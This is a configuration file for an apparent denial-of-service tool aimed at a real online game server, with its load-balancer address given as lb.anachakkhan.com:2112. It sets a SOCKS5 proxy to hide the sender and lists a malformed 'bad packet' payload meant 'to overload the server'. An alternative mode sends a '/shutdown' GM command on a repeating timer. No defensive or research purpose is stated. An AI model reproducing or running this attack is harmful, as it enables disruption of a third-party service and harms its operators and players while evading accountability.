# False = use this config file as version information.
# True  = copy GameData.bin and KhanClient.exe to this folder from khan folder. 
use_client_version : false

# Leave empty if you won't use a proxy
# Set to a SOCKS5 proxy if you want to use a proxy.
# http://www.gatherproxy.com/sockslist/country/?c=Thailand
proxy : 61.7.228.51:1080

# This is the ip:port of the balancing server NOT THE GATE.
# To get the balancing ip:port open the KhanClient.exe with a hex editor and look for the domain/ip.
# The default port is 2112.
connection : lb.anachakkhan.com:2112

# This is the version of the KhanClient.exe.
game_client_version  : 35

# This is the version of the Upgrade.exe.
game_upgrade_version : 13

# This is the version of the Data/ folder and is the one that is incremented most of the time.
game_data_version    : 515

# Attack wait time. (seconds)
wait : 5

# attack type 
# 0 = bad packet
# 1 = gm command
attack_mode : 0

# This will be the packet/payload to overload the server with
bad_packet : 05 00 00 00 00 00 00 00 00

# this will be the gm command to be sent to the server
gm_command : /shutdown

# for dev
# env GOOS=windows GOARCH=386 go build -i -o khxn32.exe main.go
# go build -i -o khxn.exe main.go
debug   : false
verbose : false